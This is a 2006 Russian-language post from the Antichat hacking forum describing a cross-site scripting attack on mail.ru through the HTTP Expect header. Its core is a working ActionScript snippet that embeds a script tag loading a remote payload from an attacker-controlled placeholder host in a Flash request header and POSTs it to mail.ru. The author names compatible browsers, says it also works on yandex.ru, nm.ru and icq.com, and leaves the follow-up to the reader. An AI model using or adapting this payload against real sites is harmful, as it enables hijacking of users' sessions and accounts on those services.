HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Xss на mail.ru через expect заголовок.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Xss на mail.ru через expect заголовок.
  #1  
Старый 16.10.2006, 19:56
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами: 10676486

Репутация: 774
По умолчанию Xss на mail.ru через expect заголовок.
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:



PHP код:
var req:LoadVars=new LoadVars(); 
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); 
req.decode("XSS"); 
req.send("http://www.mail.ru","POST"); 
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.

Уменьшаем размер и экспортируем Flash: File->Export->Export Image.





Вот в принципе и все. Думаю вы знаете что дальше делать.

P.S. Еще работает на yandex.ru, nm.ru и icq.com.
𝕏 Twitter Reddit Telegram Копировать ссылку
__________________

Завтра будет.Лучше.
Последний раз редактировалось Go0o$E; 16.10.2006 в 20:38..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss на mail.ru em00s7 Уязвимости Mail-сервис 14 08.06.2006 00:38
Broken image, при использовании XSS через аватару Qwazar PHP 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.